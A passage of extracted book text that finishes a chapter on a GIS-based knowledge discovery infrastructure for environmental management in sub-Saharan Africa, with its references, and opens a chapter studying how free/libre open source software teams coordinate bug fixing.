ponents. Nevertheless the interaction is always explicitly initiated by one of the components or by an external agent. In tight coupling, knowledge and data are not only transferred, they can be shared by the components via common internal structures (Alexandre, 1997). A comparison of the two degrees of integration would show that tightly coupled systems would definitely be difficult to upgrade without tearing down everything. Also scalability and reusability problems would arise. It would be difficult to integrate such a system outside of the application domain that warranted its design. Longley et al. (2001) believes that as standards for software development become more widely adopted, software developers or users would prefer software systems whose components are reusable. This would give them the choice of building from scratch or building by components (Longley et al., 2001). From a purely financial standpoint, choice is everything. Consequently, the three main components of the KDI are geospatial component, spatial analysis component, and the knowledge component as shown in Figure 2.
The Geospatial Component The geospatial component is purely a GIS-based tool or assortment of tools. Blaschke (2001) differentiates GIS from other spatial environmental information systems on the basis of its data linkages. Rautenstrauch and Page (2001) in making a case for environmental informatics, argue that environmental studies should not be limited to just ecological data, a view which Groot and McLaughlin (2000) already saw the need for by opining that the pendulum is moving in favor of a geospatial data infrastructure (GDI). GDI has been described by Coleman and McLaughlin (1997) as an information system linking environmental, socioeconomic and institutional databases. A key characteristic of geospatial data is its potential for multiple applications (Groot & McLaughlin, 2000) which is a reflection of the technologies, including
GPS and remote sensing, that are used to collect such data. In other words, a better understanding of environmental issues lies in integrating purely environmental subjects like ecology, land use, and so forth, with other factors that influence them, for example, the economy. A typical example of this application would be in the area of sustainable development which is the ability to simultaneously tackle the economic and environmental proportions of resource distribution and administration (Groot & McLaughlin, 2000). GIS plays the role of presenting these linkages in such a way as to force an environmental view of reality. The idea of the geospatial component is to provide a toolbox in the KDI that handles data in a way that bridges the gap between data on paper and reality on ground. According to Thurston, Poiker, and Moore (2003), the accuracy of a model is in its ability to recreate reality accurately. They emphasize that accuracy is a function of the quality of information included in the model. Looking from another perspective, given that the quality of the information (data) is acceptable both in content and in how well the contents are integrated; the value of the knowledge extracted from this information would be a function of how the data is encapsulated and manipulated. Figure 3 shows the processing that goes on within the geospatial component. The query connector acts as a kind of filter for selecting the data specified by the user. The selected data is promptly represented using either of the GIS data models- vectors and raster. This ensures consistency between how the features are stored in the database and how they are represented in visual form. The vector/raster block represents the encapsulation of the data for presentation in a visual product or map. The cyclic route linking the components shows a tightly coupled connection which ensures that at each point on the route the data will remain the same giving no loophole for data corruption. The two-sided arrow connecting the query to the visual product represents the connection between the data and visual product
785
Building an Environmental GIS Knowledge Infrastructure
Figure 3. Schematics of the interactions within the geospatial component
which makes it easy to query the database via the visual product. Against this background, the geospatial component provides the tools that enable the user to edit, display, customize, and output spatial data. It acts as the display unit of the KDI making use of the geovisualization functionality of the GIS. As a result, researchers are adopting the geovisualization view of GIS in the conceptualization of the geospatial component. This geovisualization view basically sees GIS as a set of intelligent maps or views that show features and feature relationships on the earth (Zeiler, 1999). In this setup, the map acts as a window into the geodatabase (ESRI, 2004) which is at the heart of GIS architecture. Also from a knowledge discovery point of view, the geospatial component acts as the exploratory data analysis tool that gives the user a summary of the problem at hand ensuring a greater grasp of environmental issues.
The Spatial Component Vital to understanding the need for a spatial component is the fact that the map or any other visual product is merely a representation of
786
information stored in a database. The database is the depository of spatial information and not the map (Thurston et al., 2003). Kraak (2000) argues that a map has three major functions in the manipulation of geospatial data: 1. 2. 3.
It can function as a catalog of the data available on the database. It can be used to preview available data. It can form part of a database search engine.
In a sense, the map is a guide to other information and as a result can be used to direct the extraction of information from the database. The information so extracted is then subjected to spatial analysis for the purpose of extracting knowledge, which can form the basis for updating the database in terms of reorganizing the way data is integrated or linked. Spatial analysis refers to the ability to manipulate spatial data into different forms and extract additional information as a result (Bailey, 1994). Combining spatial analysis and GIS has been a study area many researchers have been interested in. Wise and Haining (1991) identified the three
Building an Environmental GIS Knowledge Infrastructure
categories of spatial analysis as statistical spatial data analysis (SDA), map-based analysis and mathematical modeling. Haining (1994) believes that for GIS to attain its full measure, it needs to incorporate SDA techniques. The nature of this link between spatial analysis and GIS is the subject of the spatial component implementation. Based on the study of the linkage between GIS and spatial analysis, Goodwill et al. (1991) distinguished between four scenarios: 1. 2. 3. 4.
Free standing spatial analysis software Loose coupling of proprietary GIS software with statistical software Close coupling of GIS and statistical software Complete integration of statistical spatial analysis in GIS
Of all the four, most attention is on close coupling or loose coupling (Gatrell & Rowlingson, 1994) mostly because both options give the developers/users freedom in implementing the linkage in the way that will best accomplish their task. Also it makes it easy to integrate other components as the need arises. The spatial component is the integration of GIS tools and statistical tools. While the geospatial
component seeks to encapsulate the data in a way that will enhance knowledge discovery, the spatial component deals with manipulating the raw data in a way that will enhance application of the appropriate levels of theory and modeling capability in real problem solving situations (O’Kelly, 1994). To this end, the spatial component provides the tools for analysis and transformation of spatial data for environmental studies. To be able to perform the analysis, the spatial component must be able to extract the data first. To extract the data, it needs access to the GIS tools for data integration, filtering, cleaning and all the necessary data preprocessing tasks. The spatial component must possess tools that will allow the results of the spatial analysis to be used to update the database in addition to the ability to view the results. Figure 4 provides the schematics of how the spatial component works.
Knowledge Component Spatial decision support systems (SDSS) are very important tools for planning and decision making for environmental management. Normally, SDSS combine spatially explicit observational data and simulation of physical process with a representation that is suited for nonspecialist decision
Figure 4. Schematics of the interactions within the spatial component
787
Building an Environmental GIS Knowledge Infrastructure
makers and other stakeholders (Taylor, Walker & Abel, 1998). It also provides the users and decision-makers with the tools for dealing with the ill- or semistructured spatial problems in addition to providing an adequate level of performance (Abiteboul, 1997; Hopkins, 1984; Stefanakis et al., 1998; Taylor et al., 1998). According to Ting (2003), sustainable development demands complex decision making that combines environmental, social and economic consequences of the choices made with regards to resource management. Such decision making, she continues, requires ready access to current, relevant and accurate spatial information by decision makers and stakeholders. Feeney (2003) argues that spatial information is one of the most critical elements underpinning decision making for many disciplines. She went on to define decision support as the automation, modeling and/or analysis that enables information to be shaped from data. The task of the knowledge component is to transform the information extracted into knowledge thereby improving the quality of the decision making process. It accomplishes this task by providing the necessary input for creating new environmental models or validating/updating existing ones. As a result, the knowledge component is made up of a collection of learning algorithms. The
knowledge component acts as the decision support of the entire system. As the decision support component, it can be used to structure, filter and integrate information, model information where gaps occur in data, produce alternative solution scenarios as well as weight these according to priorities, and most importantly facilitate group as well as distributed participation in decision making (Feeney, 2003). The interactions taking place in the component are shown diagrammatically in Figure 5. The interactions form the basis of the implementation. The figure shows a tight- coupled integration of the components—ensuring that the data and knowledge extracted are tied together.
POTENTIAL APPLICATIONS OF THE KDI The possibility of packaging data mining methods as re-useable software applications objects have opened up the whole realm of knowledge discovery to people outside the traditional usage base. The KDI enables a knowledge discovery platform optimized for environmental applications by integrating state of the art standalone GIS application and data mining functionality in a closely coupled, open, and extensible system
Figure 5. Interactions within the knowledge component
788
Building an Environmental GIS Knowledge Infrastructure
architecture. The data mining functionality can be used to validate models for decision support systems used in generating environmental policies. For example, Mishra Ray, and Kolpin (in press) conducted a research on the neural network analysis of agrichemical occurrence in drinking water wells to predict the vulnerability of rural domestic wells in several Midwestern states of USA to determine agrichemical contamination. The research objectives included studying the correctness of results from the neural network analysis in estimating the level of contamination with known set of data and to show the impact of input parameters and methods to interpret the results. Also, Hsu et al. (1995), Shamseldin (1997), Shukla, Kok, Prasher, Clark, and Lacroix (1996), Kao (1996), Yang, Prasher, and Lacroix (1996), Maier and Dandy, 1996), Schaap and Bouten (1996) and Schaap and Linhart (1998), and Basheer, Reddi, and Najjar (1996) have all applied the neural network analysis to various problems in agriculture, water resources and environmental domains. The KDI is a great resource for applying data mining applications to water and environment–related problems. It also provides the platform for performing machine learning analysis on the magnitude of environmental data collected in order to keep up with the pace at which they are being collected. The KDI can be used as a teaching tool for an introductory course for students interested in the partnership between GIS, data mining and environmental management without overloading them with advanced GIS. It will also widen the scope of environmental students in the area of programming languages, by challenging them to design models that are portable and reuseable. It can also serve as a teaching aid in creating the need for more public participation in environmental resource management within the framework of the long distance education paradigm. The KDI is a prototype for using object oriented programming platform to enable the design of environmental modeling systems that
are reuseable with well-defined inputs, outputs and controls for easy integration.
KDI IMPLEMENTATION In the implementation, a GIS-based system which integrates logic programming and relational database techniques has been adopted. It is well documented that geographic analysis and spatial visualization improve operational efficiency, decision making, and problem solving. Software developers need the flexibility to build domain specific, easy-to-use applications that incorporate the power of GIS technology into a focused, user-friendly application (ESRI, 2004). The KDI implementation consists of a GIS component and Java Foundation Classes, JFC (see www.java. sun.com). JFC encompass a group of features for building graphical user interfaces (GUIs) and adding rich graphics functionality and interactivity to applications. The KDI application consists of a GIS component, the data mining application, and JFC that provide the interface for connecting them (Onwu, 2005). The GIS component is implemented using the ArcGIS® engine which is an integrated family of GIS software products from ESRI® that delivers complete, scalable GIS at the project, work group, and enterprise levels (ESRI, 2004). It contains developer application programming interfaces (APIs) that embed GIS logic in nonGIS-centric applications and efficiently build and deploy custom ArcGIS applications on the desktop. The data mining application can be implemented with any third party data mining application. Basically it provides the collection of machine learning algorithms for data mining tasks. This includes algorithms for classification and regression, dependency modeling/link analysis and clustering. The algorithms can either be applied directly to a dataset or called from userdefined Java code. The choice of ESRI® products is informed by the fact that they are one of the few GIS companies
789
Building an Environmental GIS Knowledge Infrastructure
with a commitment to human and institutional capacity building in Africa. JFC is open-source and will not cost the users anything to implement. The portability of the application ensures that it can be used in any operating systems –environment- which is an important consideration in an environment where there are not a lot of choices. In addition, JFC ensures that the implementation can be done in any other language besides English. This makes it possible for the end users to be able to take ownership of the application.
FUTURE ISSUES This section discusses some of the emerging technologies and how they are redefining the need for KDI and the future of the synergy of GIS and data mining.
GeoSensors GIS has been evolving over the years in response to the advances in database management technologies. Currently, advances in sensor technology and deployment strategies are transforming the way geospatial data is collected and analyzed and the quality with which they are delivered (NAS, 2003). This presupposes that the current methods of storing geospatial information are bound to change. The change is predicated on the fact that homogenous collection of data is now being replaced by heterogeneous collection of data for an area of interest, for example, video and temperature feeds. The nature of these feeds or data will warrant that pieces of information will vary in content, resolution and accuracy in addition to having a spatiotemporal component (Nittel & Stefanidis, 2005). The current trend of geosensor technology is also going to affect the time for data analysis. Usually, data is analyzed after it has been downloaded but with regards to energy considerations for the sensors, there might be the need to do real-time analysis of data being
790
collected so that the sensor can discard unnecessary data and transmit useful data in accordance to the study requirements. This implies having an on-chip data mining capability. As a result, the geospatial nature of the data being collected would necessitate the call for GIS functionality tightly integrated with the on-chip data mining application. This is targeted to minimizing the energy consumption of the sensors by reducing amount of data to transmit. Nittel and Stefanidis (2005) suggested a minimization of data acquisition time as a solution to energy optimization. In response to the ongoing development of sensor technology, Tao, Liang, Croitoru, Haider, and Wang (2005) is proposing the Sensor Web which would be the sensor-equivalent of the Internet. According to them, the Sensor Web would be a global sensor that connects all sensors or sensor databases. The Sensor Web would be interoperable, intelligent, dynamic, scalable, and mobile. This is certainly going to revolutionize the concept of GPS systems. With these sensors connecting wirelessly via Internet and possibly by satellite linkages, the possibility increases of having live feed for each location on the surface of the earth complete with video, audio and other parameters of interest at a particular time. It is going to be more like having a live Webcam with the added benefit of knowing the current wind speed, temperature, humidity, etc. all wrapped up within the framework of a GIS so that the geospatial component is not lost. This will obviously warrant a multimedia data mining application to tap into the vast knowledge trapped in the video images. The knowledge from the video feeds is then integrated with the knowledge from the nonspatial data in order to get a perfect or approximate picture. Although the emphasis would not be on perfect, but on approximate because as Evan Vlachos framed it in his opening address to GIS 1994, “it is better to be approximately right rather than precisely wrong,” (Vlachos, 1994). The success of the scenario painted in the foregoing paragraphs can only be accomplished
Building an Environmental GIS Knowledge Infrastructure
in a closely coupled working multidisciplinary partnership. All the stakeholders involved must be accommodated at the outset to offset the possibility of creating integration problems later down the road. With object oriented programming platforms, each solution would be implemented as reuseable software application object.
Geographic Data Mining The new ArcGIS 9 from ESRI is revolutionizing the concept of a geodatabase. The new ArcSDE has the capability for storing and managing vector, raster and survey dataset within the framework of the relational database management system (RDBMS) (ESRI, 2004b). This implies that not only is the geospatial data linked to nonspatial dataset; it is also linked to images. Hence the user has the choice of what kind of map to viewvector maps or satellite imagery. This creates an enabling environment for geographic data mining (GDM). Geographic data mining is at best a knowledge discovery process within the context of a map instead of a database. Miller and Han (2001) define it as the application of computational tools to reveal interesting patterns in objects or events distributed in geographic space and across time. The time component specifically refers to the satellite images which represent pictures taken over time. GDM is closely related to geographic visualization (GV) which is the integration of cartography, GIS, and scientific visualization for the purpose of exploring geographic data in order to communicate geographic information to end-users (MacEachren & Kraak, 1997). With these developments, the possibility of performing machine learning analysis on a map object will greatly increase the knowledge available for environmental management as this will reduce the level of abstraction of spatial data and preserve the loss of spatial information. Also GDM would be the best way to capture the contribution of the time component in the knowledge extracted.
There is still the problem of how to incorporate a time component in the RDBMS (NAS, 2003). But GDM of satellite maps would remove the need to abstract the time component making satellite images a repository of spatial-temporal data. The next task will be to encapsulate these developments in reuseable application objects with well defined user interfaces in order to make it accessible to the managers of environmental resources.
CONCLUSION GIS started as a technology for data creation and has now evolved into one for data management. This research focused on the development and implementation of a prototype KDI for environmental science applications. This was predicated on the need to help policy makers to grasp with the current environmental challenges. The extensible nature of the KDI makes it a dynamic tool since it allows for integration with other tools. The challenge is now to package this concept in a cost effective way as a tool to introduce GIS in the educational curriculum. In all, what GIS does is very simple. It makes a point aware of its position vis-à-vis other points. Stretching this understanding, the concept of a network becomes obvious. The challenge before sub-Saharan African countries becomes how to create a social infrastructure that will connect these points so that they can work for a common goal and avoid duplication of resources. That is the first step in taking the initiative to bridge the knowledge gap with the rest of the world. In 2003, USAID Success Stories captured the current state of Africa’s efforts in bridging this gap in the following lines: We find currently that a chasm exists, separating the users of environmental information, policymakers, and scientists from one another. We often think of this as a divide between continents, but more importantly, it is also a divide between islands of expertise. There is a divide
791
Building an Environmental GIS Knowledge Infrastructure
between highly dedicated and competent analysts in Africa from the state of the art in the rest of the world, but also between the analysts and decision-makers, and between the scientific expertise of metropolitan centers and the innate local knowledge of the environment in rural areas (USAID/AFR, 2003). Juma (2006) believes that African universities should take the initiative in community development by developing an educational curriculum that addresses the needs of the community. African universities should re-align themselves so that they became active participants with the international organizations in institutional capacity building. African universities should provide the leverage needed to bring the expertise together. The road to sustainable development in subSaharan Africa will not be complete without addressing the role of governments. Juma (2006) proposes the role of governments as a facilitator. With government as facilitator, this creates a level field for public-private partnerships in the form of nongovernmental organizations to step in and get the knowledge to the rural communities by creating urban-rural partnerships and investing in youths as the harbinger of rural development. As a facilitator, African government should be committed to the fact that knowledge is the currency of development and if the developing countries must join their developed counterparts in providing basic services to their citizens, there is the need to create a unified system of tracking the vast potentials in Africa and organizing it in such a way that it can provide insights that would produce policies that would bring about development in Africa. The main benefit for the establishment of a GIS based system is to stimulate and assist development activities in the region. One way of doing this is by creating a commission tasked with the creation of baseline geographic data at the local government level and converting existing data into digital format. The funding for this commission can be sourced from private
792
companies, or international agencies/foreign aid. The availability of baseline data makes it easy for international development agencies to track the progress of development in a region. In the face of the failure of technology transfer in the developing countries, there is need for a GIS system that answers the more fundamental social and economic questions as well as the technical ones, an opinion exemplified by Ficenec (2003). GIS is very important for stimulating community development by providing a way for policy makers to match resources with potentials available in a community. This leads to grassroot development, poverty reduction, job opportunities, and overall, an economically viable state.
REFERENCES Abiteboul, S. (1997). Querying semi-structured data. In Proceedings of the International Conference on Database Theory, Delphi, Greece. AfricaGIS (2005). Conference resolutions draft. Retrieved April 13, 2008, from http://www.africagis2005.org.za/agp/africagispapers/AfricaGIS 2005 Resolutions draft 041105.doc Albertoni, R., Bertone, A., & De Martino, M. A. (2003). Visualization-based approach to explore geographic metadata. In Proceedings of the 11th International Conference in Central Europe on Computer Graphics, Visualization and Computer Vision, WSCG 2003, Plzen-Bory, Czech Republic. Alexandre, F. (1997). Connectionist-symbolic integration: From unified to hybrid approaches. Mahwah, NJ: Lawrence Erlbaum Associates. Bailey, T. C. (1994). A review of statistical spatial analysis in geographical information systems. In A. S. Fotheringham & P. A. Rogerson (Ed.), Spatial analysis and GIS (pp. 14-44). London, UK: Taylor and Francis.
Building an Environmental GIS Knowledge Infrastructure
Basheer, I. A., Reddi, L. N., & Najjar, Y. M. (1996). Site characterization by NeuroNets: An application to the landfill siting problem. Ground Water, 34, 610-617. Bedard, Y., Gosselin, P., Rivest, S., Proulx, M., Nadeau, M., Lebel, G., & Gagnon, M., (2003). Integrating GIS components with knowledge discovery technology for environmental health decision support. International Journal of Medical Informatics, 70, 79-94. Blaschke, A. (2001). Environmental monitoring and management of protected areas through integrated ecological information systems- An EU perspective. In C. Rautenstrauch & S. Patig (Ed.), Environmental information systems in industry and public administration (pp. 75-100). Hershey, PA: Idea Group Publishing. Brachman, R. J. & Anand, T. (1996). The process of knowledge discovery in databases. In U. Fayyad, G. Piatetsky-Shapiro, P. Smyth & R. Uthurusamy (Ed.), Advances in knowledge discovery and data mining (pp. 37-57). Cambridge, MA: AAAI/MIT Press. Chainey, S. & Ratcliffe, J. (2005). GIS and crime mapping. Chichester, West Sussex: John Wiley and Sons. Chetty, M. & Buyya, R. (2002). Weaving computational crids: How analogous are they with electrical grids? IEEE Computing in Science and Engineering, July/August, 61-71. Coleman, D. J. & McLaughlin, J. D. (1997). Information access and network usage in the emerging spatial information marketplace. Journal of Urban and Regional Information Systems Association, 9, 8-19. Dunn, C. E., Atkins, P. J., & Townsend, J. G. (1997). GIS for development: A contradiction in terms? Area, 29(2), 151-159.
ESRI (2004a). ArcGIS 9: What is ArcGIS? A White Paper. Redlands, CA: Environmental Systems Research Institute. ESRI (2004b). ArcSDE: Advanced spatial data server. White Paper. Retrieved May 8, 2008 from http://esri.com/library/whitepapers/pdfs/ arcgis_spatial_analyst.pdf Fayyad, U., Piatetsky-Shapiro, G., & Smyth, P. (1996). From data mining to knowledge discovery in databases. AI Magazine, 17, 37-54. Feeney, M. F. (2003). SDIs and decision support. In I. Williamson, A. Rajabifard, & M. F. Feeney (Ed.), Developing spatial data infrastructures: From concept to reality (pp. 195-210). London, UK: Taylor & Francis. Ficenec, C. (2003, June). Explorations of participatory GIS in three Andean watersheds. Paper presented at the University Consortium of Geographic Information Science (UCGIS) Summer Assembly 2003, Pacific Grove, CA. Gatrell, A. & Rowlingson, B. (1994). Spatial point process modeling in a GIS environment. In A.S. Fotheringham & P.A. Rogerson (Ed.), Spatial analysis and GIS (pp. 148-163). London, UK: Taylor and Francis. Goodchild, M. F., Haining, R., & Wise, S. M. (1991). Integrating GIS and spatial data analysis: Problems and possibilities. International Journal of Geographic Information Systems, 6, 407-423. Groot, R. & McLaughlin, J. (2000). Introduction. In R. Groot & J. McLaughlin (Eds.), Geospatial data infrastructure: Concepts, cases and good practice (pp. 1-12). Oxford, UK: Oxford University Press. Haining, R. (1994). Designing spatial data analysis modules for GIS. In A.S. Fotheringham & P.A. Rogerson (Eds.), Spatial analysis and GIS (pp. 46-63). London, UK: Taylor and Francis.
793
Building an Environmental GIS Knowledge Infrastructure
Han, J. (1999). Data mining. In J. Urban & P. Dasgupta (Eds.), Encyclopedia of distributed computing. Kluwer Academic Publishers. Hopkins, L. D. (1984). Evaluation of methods for exploring Ill-defined problems. Environmental Planning B: Planning and Design, 11, 339-348. Hsu, K-L., Gupta, H. V., & Soroosian, S. (1995). Artificial neural network modeling of the rainfall-runoff process. Water Resour. Res., 31, 2517-2530. Juma, C. (2006, April). Reinventing African economies: Technological innovation and the sustainability tansition. Paper presented at The John Pesek Colloquium on Sustainable Agriculture, Ames, Iowa Kao, J-J. (1996). Neural net for determining DEMbased model drainage pattern. Journal of Irrigation and Drainage Engineering, 122, 112-121. Keim, D. A. (2002). Information visualization and visual data mining. IEEE Transactions on Visualization and Computer Graphics, 7, 100-107. Khatri, V., Ram, S., & Snodgrass, R. T. (2004). Augmenting a conceptual model with geospatiotemporal annotations. IEEE Transactions on Knowledge And Data Engineering, 16, 13241338. Koua, E. L. & Kraak, M. J. (2004). Geovisualization to support the exploration of large health and demographic survey data. International Journal of Health Geographics, 3,12. Kraak, M.-J. (2000). Access to GDI and the function of visualization tools. In R. Groot & J. McLaughlin (Eds.), Geospatial data infrastructure: Concepts, cases and good practice (pp. 217-321). Oxford, UK: Oxford University Press. Kufoniyi, O., Huurneman, G., & Horn, J. (2005, April). Human and institutional capacity building in geoinformatics through educational networking. Paper presented at the International
794
Federation of Surveyors Working Week 2005, Cairo, Egypt. Lee, H. Y., Ong, H. L., & Quek, L. H. (1995). Exploiting visualization in knowledge discovery. In Proceedings of the 1st International Conference on Knowledge Discovery and Data Mining (pp. 198 – 201), Montreal, Canada. Lee, H. Y., Ong, H. L., Toh, E. W., & Chan, S. K. (1996). A multi-dimensional data visualization tool for knowledge discovery in databases. In Proceedings of IEEE Conference on Visualization, pp. 26–31. Longley, P. A., Goodchild, M. F., Maguire, D.J., & Rhind, D. W. (2001). Geographic information systems and science. West Sussex, England: John Wiley and Son, Ltd. Maier, H. R. & Dandy, G. C. (1996). The use of artificial neural networks for the prediction of water quality parameters. Water Resour. Res., 32, 1013-1022. MacEachren, A. M. & Kraak, M.-J. (1997). Exploratory carthographic visualization: Advancing the agenda. Computer and Geosciences, 23, 335-343. Miller, H. J. (in press). Geographic data mining and knowledge discovery. In J.P. Wilson & A. S. Fotheringham (Eds.), Handbook of geographic information science. Blackwell. Miller, H. J. & Han, J. (2001). Geographic data mining and knowledge discovery. London: Taylor and Francis. Mishra, A., Ray, C., & Kolpin, D. W. (in press). Use of qualitative and quantitative information in neural networks for assessing agricultural chemical contamination of domestic wells. Journal of Hydrological Engineering. Mitra, S. & Acharya, T. (2003). Data mining: Multimedia, soft computing and bioinformatics. Hoboken, NJ: John Wiley and Sons, Inc.
Building an Environmental GIS Knowledge Infrastructure
Mokyr, J. (2002). The gifts of Athena: Historical origins of the knowledge economy. New Haven: Princeton University Press.
Schaap, M. G. & Bouten, W. (1996). Modeling water retention curves of sandy soils using neural networks. Water Resour. Res., 32, 3033-3040.
National Academy of Sciences (NAS) (2003). IT roadmap to a geospatial future., Washington, D.C.: The National Academies Press.
Shamseldin, A. Y. (1997). Application of a neural network technique to rainfall-runoff modeling. Journal of Hydrology, 199, 272-294.
National Academy of Sciences (NAS) (2003). IT roadmap to a geospatial future. Washington, D.C.: The National Academies Press.
Shukla, M. B., Kok, R., Prasher, S. O., Clark, G., & Lacroix, R. (1996). Use of artificial neural networks in transient drainage design. Transactions of the ASAE, 39, 119-124.
Nittel, S. & Stefanidis, A. (2005). GeoSensor networks and virtual GeoReality. In S. Nittel & A. Stefanidis (Eds.), GeoSensor networks (pp. 1-9). Boca Raton, FL: CRC Press. O’Kelly, M. E. (1994). Spatial analysis and GIS. In A.S. Fotheringham & P.A. Rogerson (Eds.), Spatial analysis and GIS (pp. 66-79). London, UK: Taylor and Francis. Onwu, I. (2005). Knowledge discovery interface for environmental applications. Unpublished master’s thesis, Iowa State University, Ames. Ratcliffe, J. (2004). Strategic thinking in criminal intelligence. Sydney: Federation Press. Rautenstrauch, C. & Page, B. (2001). Environmental informatics-methods, tools and applications in environmental information processing. In C. Rautenstrauch & S. Patig (Eds.), Environmental information systems in industry and public administration (pp. 2-11). Hershey, PA: Idea Group Publishing. Rüther, H. (2001, October). EIS education in Africa – The geomatics perspective. Paper presented at the International Conference on Spatial Information for Sustainable Development, Nairobi, Kenya Schaap, B. D. & Linhart, S.M. (1998). Quality of ground water used for selected municipal water supplies in Iowa, 1982-96 water years (p. 67). Iowa City, IA: U.S. Geological Survey Open File Report 98-3.
Sobeih, A. (2005). Supporting natural resource management and local development in a developing connection: Bridging the policy gap between the information society and sustainable development. A publication of the International Institute for Sustainable Development (IISD), pp. 186-210. Song, S. (2005). Viewpoint: Bandwidth can bring African universities up to speed. Science in Africa, September 2005. Retrieved April 13, 2008, from http://www.scienceinafrica.co.za/2005/september/bandwidth.htm Speth, J. G. (2004). Red sky at morning: America and the crisis of the global environment. Yale University Press. Stefanakis, E., Vazirgiannis, M., & Sellis, T. (1999). Incorporating fuzzy set methodologies in a DBMS repository for the application domain of GIS. International Journal of Geographic Information Science, 13, 657-675. Taylor, K., Walker, G., & Abel, D. (1999). A framework for model integration in spatial decision support systems. International Journal of Geographic Information Science, 13, 533-555. Tao, V., Liang, S., Croitoru, A., Haider, Z. M., & Wang, C. (2005). GeoSwift: Open geospatial sensing services for sensor web. In S. Nittel & A. Stefanidis (Eds.), GeoSensor Networks (pp. 267-274). Boca Raton, FL: CRC Press.
795
Building an Environmental GIS Knowledge Infrastructure
Thuraisingham, B. M. (1999). Data mining: Technologies, techniques, tools and trends. Boca Raton, FL: CRC Press. Thurston, J., Poiker, T. K., & Moore, J. P. (2003). Integrated geospatial technologies: A guide to GPS, GIS, and data logging. Hoboken, NJ: John Wiley & Sons. Ting, L. (2003). Sustainable development, the place for SDIs, and the potential of e-governance. In I. Williamson, A. Rajabifard & M. F. Feeney (Eds.), Developing spatial data infrastructures: From concept to reality (pp. 183-194). London, UK: Taylor & Francis. USAID (2003). USAID Africa success stories. Retrieved April 13, 2008, from http://africastories. usaid.gov:80/print_story.cfm?storyID=23 Vckovski, A. & Bucher, F. (1996). Virtual data sets - Smart data for environmental applications. In Proceedings of the Third International Conference/Workshop on Integrating GIS and Environmental Modeling, Santa Fe, NM.
Vlachos, E. (1994). GIS, DSS and the future. In Proceedings of the 8th Annual Symposium on Geographic Information Systems in Forestry, Environmental and Natural Resources Management, Vancouver, Canada. Wise, S. M. & Haining, R. P. (1991). The role of spatial analysis in geographical information systems. Westrade Fairs, 3, 1-8. Yang, C.-C., Prasher, S. O., & Lacroix, R. (1996). Application of artificial neural networks to land drainage engineering. Trans. ASAE, 39, 525533. Zaïane, O. R., Han, J., Li, Z.-N., & Hou, J. (1998). Mining Multimedia Data. In Proceedings of the CASCON’98: Meeting of Minds (pp. 83-96), Toronto, Canada. Zeiler, M. (1999). Modeling our world: The ESRI guide to Geodatabase design. Redlands, CA: ESRI Press.
This work was previously published in Data Mining Applications for Empowering Knowledge Societies, edited by H. Rahman, pp. 260-277, copyright 2009 by Information Science Reference, formerly known as Idea Group Reference (an imprint of IGI Global).
796
797
Chapter 2.20
Bug Fixing Practices within Free/Libre Open Source Software Development Teams1 Kevin Crowston Syracuse University, USA Barbara Scozzi Politecnico di Bari, Italy
ABSTRACT Free/Libre open source software (FLOSS, e.g., Linux or Apache) is primarily developed by distributed teams. Developers contribute from around the world and coordinate their activity almost exclusively by means of email and bulletin boards, yet some how profit from the advantages and evade the challenges of distributed software development. In this article we investigate the structure and the coordination practices adopted by development teams during the bug-fixing process, which is considered one of main areas of FLOSS project success. In particular, based on a codification of the messages recorded in the bug tracking system of four projects, we identify the accomplished tasks, the adopted coordination mechanisms, and the role undertaken by both the FLOSS development team and the FLOSS
community. We conclude with suggestions for further research.
INTRODUCTION In this article, we investigate the coordination practices for software bug fixing in Free/Libre open source software (FLOSS) development teams. Key to our interest is that most FLOSS software is developed by distributed teams, that is, geographically dispersed groups of individuals working together over time towards a common goal (Ahuja et al., 1997, p. 165; Weisband, 2002). FLOSS developers contribute from around the world, meet face to face infrequently, if at all, and coordinate their activity primarily by means of computer mediated communications (Raymond, 1998; Wayner, 2000). As a result, distributed teams
Bug Fixing Practices within Free/Libre Open Source Software Development Teams
employ processes that span traditional boundaries of place and ownership. Since such teams are increasingly commonly used in a diversity of settings, it is important to understand how team members can effectively coordinate their work. The research literature on distributed work and on software development specifically emphasizes the difficulties of distributed software development, but the case of FLOSS development presents an intriguing counter-example, at least in part: a number of projects have been outstandingly successful. What is perhaps most surprising is that FLOSS development teams seem not to use many traditional coordination mechanisms such as formal planning, system level design, schedules and defined development processes (Mockus et al., 2002, p. 310). As well, many (though by no means all) programmers contribute to projects as volunteers, without working for a common organization and/or being paid. The contribution of this article is to document the process of coordination in effective FLOSS teams for a particularly important process, namely bug fixing. These practices are analyzed by adopting a process theory, that is, we investigate which tasks are accomplished, how and by whom they are assigned, coordinated, and performed. In particular, we selected four FLOSS projects, inductively coded the steps involved in fixing various bugs as recorded in the projects’ bug tracking systems and applied coordination theory to identify tasks and coordination mechanisms carried out within the bug-fixing process. Studying coordination of FLOSS processes is important for several reasons. First, FLOSS development is an important phenomenon deserving of study for itself. FLOSS is an increasingly important commercial issue involving all kind of software firms. Million of users depend on systems such as Linux and the Internet (heavily dependent on FLOSS software tools) but as Scacchi notes “little is known about how people in these communities coordinate software development across different settings, or about what software
798
processes, work practices, and organizational contexts are necessary to their success” (Scacchi, 2002, p. 1; Scacchi, 2005). Understanding the reasons that some projects are effective while others are not is a further motivation for studying the FLOSS development processes. Second, studying how distributed software developers coordinate their efforts to ensure, at least in some cases, high-performance outcomes has both theoretical and managerial implications. It can help understanding coordination practices adopted in social collectives that are not governed, at least apparently, by a formal organizational structure and are characterized by many other discontinuities that is, lack of coherence in some aspects of the work setting: organization, function, membership, language, culture, etc. (Watson-Manheim et al., 2002). As to the managerial implications, distributed teams of all sorts are increasingly used in many organizations. The study could be useful to managers that are considering the adoption of this organizational form not only in the field of software development. The remainder of the article is organized as follows. In Section 2 we discuss the theoretical background of the study. In Section 3 we stress the relevance of process theory so explaining why we adopted such a theoretical approach. We then describe coordination theory and use it to describe the bug-fixing process as carried out in traditional organizations. The research methodology adopted to study the bug-fixing process is described in Section 4. In Section 5 and 6 we describe and discuss the study’s results. Finally, in Section 7 we draw some conclusions and propose future research directions.
BACKGROUND In this section we provide an overview of the literature on software development in distributed environment and the FLOSS phenomenon.
Bug Fixing Practices within Free/Libre Open Source Software Development Teams
